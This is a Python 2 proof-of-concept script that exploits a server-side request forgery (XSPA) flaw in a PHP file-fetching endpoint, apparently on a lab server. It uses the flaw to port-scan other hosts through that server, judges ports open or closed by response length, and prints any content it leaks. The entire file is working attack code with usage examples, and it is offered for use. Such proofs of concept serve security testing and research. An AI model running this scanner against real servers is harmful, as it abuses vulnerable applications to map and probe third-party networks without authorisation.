import sys
import httplib
import urllib
import json
import re
from pprint import pprint

url = "vulnerableserver"

useragent = "Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"

def portscan(port):
    conn = httplib.HTTPConnection(url,80)
    params = urllib.urlencode({'url':ip + ':' + str(port) + '/'})
    headers = {"User-Agent":useragent, "Host":url, "Content-type": "application/x-www-form-urlencoded", "Content-Length":len(params)}
    conn.request('POST', 'http://vulnerableserver/xspa/getfile3.php',params,headers)
    res = conn.getresponse()
    data = res.read()
    #print data

    begin = data.find('<pre>')
    end = data.find('</pre>')
           
    if len(data)== 303:
        status = "Closed"
    else:
        print data[begin+len('<pre>'):end]
        status = "Open"
        
    print str(port) + ":" + status + "\n"
    

helpmsg = "PoC for XSPA based Port Scanning\nCreated by Riyaz Ahemed Walikar\n\nUsage: port_scan_via_xspa.py <ip_address> <portrange|all|csv_ports>\n\nExample: port_scan_via_xspa.py scanme.nmap.org 20-3890\nExample: port_scan_via_xspa.py scanme.nmap.org all\nExample: port_scan_via_xspa.py scanme.nmap.org 22,23,80,445,3389,9929,10201\n"
if len(sys.argv) < 3:
        print "Not enough parameters.\n"
        print helpmsg
        sys.exit()
        
ip = sys.argv[1]
portnum = sys.argv[2]

print "Starting portscan on " + ip + " using the " + url + " URL: http://192.168.56.102/xspa/getfile3.php\n"

if portnum.find("-") > 1:
    startport = int(portnum.split("-")[0])
    endport = int(portnum.split("-")[1])
    for port in range(startport,endport+1):
        portscan(port)
    sys.exit()
    
if str.upper(portnum) == "ALL":
    for port in range(1,65536):
        portscan(port)
    sys.exit()
    
if portnum.find(",") > 1:
    ports = portnum.split(",")
    for port in ports:
        portscan(port)
    sys.exit()

if portnum.isdigit() == 1:
    if int(portnum) > 0 and int(portnum) < 65536:
        port = int(portnum)
        portscan(port)
        sys.exit()

    
print "Invalid parameters.\n"
print helpmsg
sys.exit()
